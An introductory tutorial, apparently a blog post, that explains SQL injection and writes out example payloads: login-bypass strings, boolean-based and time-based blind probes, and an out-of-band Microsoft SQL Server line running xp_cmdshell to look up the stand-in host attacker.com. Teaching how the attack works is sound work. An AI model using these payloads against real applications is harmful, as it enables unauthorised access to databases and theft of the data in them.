SQL, or Structured Query Language, is an amazing and really powerful tool used for managing and manipulating data in databases. It lets the user retrieve, update, delete, and insert data, and it is efficient at it. Whether it is a small application or a large one, SQL plays a very important role in handling data. It is simple and flexible, making it a favourite among developers. However, with great power come vulnerabilities, and one of the most common threats is SQL injection.
How SQL Injection Works
SQL injection is a hacking technique that takes advantage of weaknesses or loopholes in an application's database query system. Attackers manipulate input fields, like login forms or search bars, by injecting malicious SQL code. This code tricks the database into executing unintended commands. For example, instead of just logging in, the attacker could gain unauthorized access to sensitive data or even delete entire tables. This happens because the application does not validate or sanitize user input before placing it in the query, which serves as a gateway for hackers.
An Introduction to SQL Injection: A Basic Example
Suppose you have a login page where you insert a username and password. The SQL statement involved here might be like this:
SELECT * FROM users WHERE username = 'input' AND password = 'input';
An attacker could fill in both boxes with ' OR '1'='1. The query will then turn out to be this:
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '' OR '1'='1';
Since '1'='1' is always true, the database returns all users, giving the attacker access. Another way to use this technique is to type in the correct username and, for the password, the condition username' or '1'='1'; --. The password part of the SQL statement is now commented out. A further variant is error-based SQL injection, for example: SELECT * FROM users WHERE id = 1 AND extractvalue(1, 'XPath expression');
There are 3 types of SQL injections
In-band (Classic) SQL Injection
Inferential (Blind) SQL Injection
Out-of-band SQL Injection
Now let’s talk about Inferential (Blind) SQL Injection. Unlike in-band SQL injection, it doesn’t reveal data directly. Instead, attackers infer information by observing the database’s behavior. This is divided into two types:
Boolean-based Blind SQL Injection
Time-based Blind SQL Injection
Boolean-based Blind SQL Injection
This involves sending true/false queries and watching the application’s response.
Example:
Vulnerable Query:
SELECT title FROM products WHERE id = '1';
Injected Input:
The attacker enters 1' AND 1=1;--. This makes the query:
SELECT title FROM products WHERE id = '1' AND 1=1;--
Since 1=1 is true, the query works, and the application shows normal results.
Testing False Condition:
Next, the attacker inputs: 1' AND 1=2;--. The query becomes:
SELECT title FROM products WHERE id = '1' AND 1=2;--
Here, 1=2 is false, so the application returns nothing.
Time-based Blind SQL Injection
This one is sneaky. It makes the database server pause to confirm certain conditions.
Example:
Vulnerable Query:
SELECT title FROM products WHERE id = '1';
Injected Input:
The attacker could input: 1' AND IF(1=1, SLEEP(5), 0);-- for MySQL. The query becomes:
SELECT title FROM products WHERE id = '1' AND IF(1=1, SLEEP(5), 0);--
If the response is delayed by 5 seconds, the condition is true.
Testing False Condition:
To test a false condition, they input: 1' AND IF(1=2, SLEEP(5), 0);--. This won’t delay the response because 1=2 is false.
Finally, there’s Out-of-band SQL Injection.
This method uses external servers to get the data. It’s less common and needs special features on the database.
Example:
Vulnerable Query:
SELECT title FROM products WHERE id = '1';
Injected Input:
The attacker inputs: 1; EXEC xp_cmdshell('nslookup attacker.com');-- for Microsoft SQL Server. The query becomes:
SELECT title FROM products WHERE id = '1'; EXEC xp_cmdshell('nslookup attacker.com');--
This command makes the server send a DNS request to attacker.com, letting the attacker know the injection worked and revealing the server’s IP address.
Hope you learnt something new
Happy Coding…